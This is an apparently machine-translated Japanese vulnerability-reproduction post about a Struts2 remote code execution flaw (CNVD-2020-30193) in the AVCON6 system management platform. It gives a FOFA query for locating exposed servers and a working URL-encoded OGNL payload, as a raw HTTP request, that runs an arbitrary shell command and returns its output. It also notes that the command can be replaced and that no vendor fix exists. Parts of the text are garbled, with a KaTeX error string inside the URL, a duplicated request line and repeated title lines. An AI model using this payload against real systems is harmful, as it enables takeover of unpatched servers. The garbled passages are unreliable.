Warburg Pincus Information Technology Co., Ltd. の AVCON6 システム管理プラットフォームには、Strut2 リモートコード実行の脆弱性があります。

免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。

1. Warburg Pincus Information Technology Co., Ltd.のシステム管理プラットフォーム AVCON6 の紹介

WeChat 公式アカウント検索: 南峰脆弱性再現ライブラリ
この記事は、南峰脆弱性再現ライブラリ公式アカウントで最初に公開されました。

Warburg Pincus Information Technology Co., Ltd. は、マルチメディア通信システムとスマートシティソリューションのプロバイダーです。Warburg Pincus Information Technology Co., Ltd. の AVCON6 システム管理プラットフォームには、Strut2 リモートコード実行の脆弱性が存在します。攻撃者がリモートからコマンドを実行し、サーバー権限を取得できるようにします。

2. 脆弱性の説明

CVE ID:
CNNVD ID:
CNVD ID: CNVD-2020-30193

3. バージョンに影響を与える

AVCON6
Warburg Pincus Information Technology Co., Ltd. の AVCON6 システム管理プラットフォームには、Strut2 リモートコード実行の脆弱性があります。

4. fofaクエリステートメント

title=“AVCON”

5. 脆弱性の再発

漏洞链接：http://127.0.0.1:8800/login.action?redirect: $KaTeX 解析エラー: 予期された '}'、入力の末尾に 'EOF' を取得しました: \dotsction?redirect:$ {%23a%3d(new% 20java.lang.ProcessBuilder(new%20java.lang.String[]{“id”})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(% 23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony .xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

脆弱性パケット:

GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{"id"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}%20GET%20/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{"id"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: 127.0.0.1:8800
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

ここで id コマンドが正常に実行されました。または、id コマンドを実行したいコマンドに変更することもできます。
Warburg Pincus Information Technology Co., Ltd. の AVCON6 システム管理プラットフォームには、Strut2 リモートコード実行の脆弱性があります。

市販のstrut2コマンド実行脆弱性ツールを利用することも可能
Warburg Pincus Information Technology Co., Ltd. の AVCON6 システム管理プラットフォームには、Strut2 リモートコード実行の脆弱性があります。

6.POC&EXP

公開アカウント Nanfeng Vulnerability Reproduction Library をフォローし、Vulnerability Reproduction 28 と返信して、
上記の strut2 コマンド活用ツールのダウンロードアドレスを取得します。
Warburg Pincus Information Technology Co., Ltd. の AVCON6 システム管理プラットフォームには、Strut2 リモートコード実行の脆弱性があります。

7. 是正意見

メーカーはまだ修理ソリューションを提供していません。タイムリーな更新についてはメーカーの Web サイトにご注意ください: http://www.avcon.com.cn/